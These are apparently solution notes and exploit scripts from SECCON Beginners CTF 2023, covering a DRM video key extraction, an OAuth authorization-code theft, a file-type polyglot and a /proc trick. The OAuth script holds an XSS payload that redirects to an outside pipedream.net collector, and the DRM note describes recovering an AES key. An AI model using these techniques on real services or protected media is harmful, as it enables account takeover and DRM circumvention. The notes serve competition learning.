SECCON Beginners CTF 2023

drm.md

bundleされたhls.jsを見てgetDecryptDataにbreakpointを張る

https://github.com/video-dev/hls.js/blob/f97f561d6cc2ee07d39060897154b70ea38028bd/src/loader/level-key.ts#L112

一回目はパスして、二回目のthis.keyを見るとAESのkeyがわかる

あとはffmpegでmp4を復元する

oooauth.py

import requests

# url = "http://localhost:3001/"
# client_url = "http://localhost:3000/"

url = "https://oooauth.beginners.seccon.games:3001/"
client_url = "https://oooauth.beginners.seccon.games:3000/"

ses = requests.Session()

data = {
	"username": "guest",
	"password": "guest",
	"approved": "Approve",
}

# get valid codevalue
xss = '<meta/http-equiv="refresh"/content="0;https://eo89rba2rkj9j6f.m.pipedream.net">'
res = ses.get(f"{url}auth?response_type=code&client_id=oauth-client&redirect_uri={client_url}callback&scopes={xss}")
res = ses.post(f"{url}approve", data = data, allow_redirects=False)

code = res.headers["Location"].split("?code=")[1]
print(code)

url = f"{url}auth"
url += "?response_type=code&client_id=oauth-client"
url += '&scopes=hoge'
url += f"&redirect_uri={client_url}callback"
url += "?" + "grant_type%26" + "redirect_uri%26" + "a%26" * 997 + f"code={code}"

print(url)

polyglot4b2.py

"""
5種類の開始位置が異なる%sを持つマッチパターンをfile -dの出力から頑張って見つけて、polyglotする
"""

"""
0	string		PMEM
>4	string		OBJ
>>4096	string		>0		\b, obj.layout: '%s'
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/pmem#L44

20      string          GPAT            GIMP pattern data,
>24     string          x               %s
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/gimp#L47

44	string		PTMF		Poly Tracker PTM Module
>0	string		>\32		Title: "%s"
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/audio#L470

60	string		RINEX
>80	search/256	XXRINEXB	RINEX Data, GEO SBAS Broadcast
>>&32	string		x		\b, date %15.15s
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/meteorological#L8


1080	string	OKTA		8-channel Octalyzer module sound data
!:mime	audio/x-mod
#audio/x-octalysertracker-module
>0	string	>\0		Title: "%s"
https://github.com/file/file/blob/a98c50fe474d83945450aad5a306c27ffbed26a9/magic/Magdir/audio#L232
"""

payload = "PMEMOBJPDF"
payload += "K" * (20 - len(payload)) + "GPAT" + "PNG"
payload += "K" * (44 - len(payload)) + "PTMF" + "GIF"+"ELF"
payload += "K" * (60 - len(payload)) + "RINEX" + "K" * 20 + "XXRINEXB" + "K" * 32 + "JPEG" 
# payload += "K" * (0x100 - len(payload)) + "IMA" + "ELF"*10
payload += "K" * (1080 - len(payload)) + "OKTA"
payload += "K" * (4096 - len(payload)) + "PNG"
payload += "K" * (4990 - len(payload))

payload += "\nQUIT\n"

# print(payload)

open("exp","w").write(payload)

"""
$ file -bkr exp
RINEX Data, GEO SBAS Broadcast, date JPEGKKKKKKKKKKK, version BJPDFK
-  Persistent Memory Pool file, type: OBJ, version: 0x4b4b4644, compat: 0x4b4b4b4b, incompat: 0x4b4b4b4b, ro_compat: 0x54415047, crtime: *Invalid time*, alignment_desc: 0x4b4b4b4b4b4b4b47, machine_class: unknown (0x75), data: unknown (0x75), reserved[0]: 75, reserved[1]: 75, reserved[2]: 75, reserved[3]: 75, machine: unknown (0x19275), obj.layout: 'PNGKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK'
- 8-channel Octalyzer module sound data Title: "PMEMOBJPDFKKKKKKKKKKGPATPNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKK"
- Poly Tracker PTM Module Title: "PMEMOBJPDFKKKKKKKKKKGPATPNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKK"
- GIMP pattern data, PNGKKKKKKKKKKKKKKKKKPTMFGIFELFKKKKKKRINEXKKKKKKKKKKKKKKKKKKKKXXRINEXBKKKKKKKKKKKKKKKKKKKKKKKKKK
- , ASCII text, with very long lines
"""

treasure.md

https://linuxjm.osdn.jp/html/LDP_man-pages/man5/proc.5.html を見る

/proc/self/syscallを見るとread syscallをしている様子を確認できて、引数を読むとfdがわかる